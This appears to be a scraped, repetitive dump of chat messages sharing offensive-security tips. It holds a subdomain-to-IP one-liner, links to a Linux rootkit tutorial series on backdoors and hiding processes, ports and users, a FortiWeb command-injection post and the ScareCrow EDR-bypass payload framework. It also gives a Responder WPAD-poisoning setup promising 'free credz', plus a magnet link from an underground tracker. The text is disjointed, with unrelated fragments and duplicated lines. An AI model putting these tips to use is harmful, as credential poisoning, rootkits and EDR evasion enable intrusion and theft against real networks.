Resolve domains into IP address:
"cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt"
"cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt"
Linux Rootkits:
Part 1 - Introduction and Worflow
https://xcellerator.github.io/posts/linux_rootkits_01
Part 2 - Ftrace and Function Hooking
https://xcellerator.github.io/posts/linux_rootkits_02
Part 3 - A Backdoor to Root
https://xcellerator.github.io/posts/linux_rootkits_03
Part 4 - Backdooring PRNGs by Interfering with Char Dev.
https://xcellerator.github.io/posts/linux_rootkits_04
Part 5 - Hiding Kernel Modules from Userspace
https://xcellerator.github.io/posts/linux_rootkits_05
Part 6 - Hiding Directories
https://xcellerator.github.io/posts/linux_rootkits_06
Part 7 - Hiding Processes
https://xcellerator.github.io/posts/linux_rootkits_07
Part 8 - Hiding Open Ports
https://xcellerator.github.io/posts/linux_rootkits_08
Part 9 - Hiding Logged In Users
https://xcellerator.github.io/posts/linux_rootkits_09
Part 1 - Introduction and Worflow
https://xcellerator.github.io/posts/linux_rootkits_01
Part 2 - Ftrace and Function Hooking
https://xcellerator.github.io/posts/linux_rootkits_02
Part 3 - A Backdoor to Root
https://xcellerator.github.io/posts/linux_rootkits_03
Part 4 - Backdooring PRNGs by Interfering with Char Dev.
https://xcellerator.github.io/posts/linux_rootkits_04
Part 5 - Hiding Kernel Modules from Userspace
https://xcellerator.github.io/posts/linux_rootkits_05
Part 6 - Hiding Directories
https://xcellerator.github.io/posts/linux_rootkits_06
Part 7 - Hiding Processes
https://xcellerator.github.io/posts/linux_rootkits_07
Part 8 - Hiding Open Ports
https://xcellerator.github.io/posts/linux_rootkits_08
Part 9 - Hiding Logged In Users
https://xcellerator.github.io/posts/linux_rootkits_09
Linux Rootkits Part 1: Introduction and Workflow
Linux Rootkits Part 1: Introduction and Workflow :: TheXcellerator
Learning about Linux rootkits is a great way to learn more about how the kernel works. What’s great about it is that, unless you really understand what the kernel is doing, your rootkit is unlikely to work, so it serves as a fantasic verifier.
In the FreeBSD…
In the FreeBSD…
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
Rapid7
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
When using the DHCP module, make sure to edit Responder.conf WPAD's noscript.
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
https://github.com/optiv/ScareCrow
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow
magnet:?xt=urn:btih:d0d7bfd41eb5fef91b8b348e1e92267ec8bf9ccf&dn=[underver.se].t216987.torrent&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Fexplodie.org%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337&tr=http%3A%2F%2Fretracker.local/announce&tr=http%3A%2F%2Fund3rv3rse.info%2Ffree%2Fannounce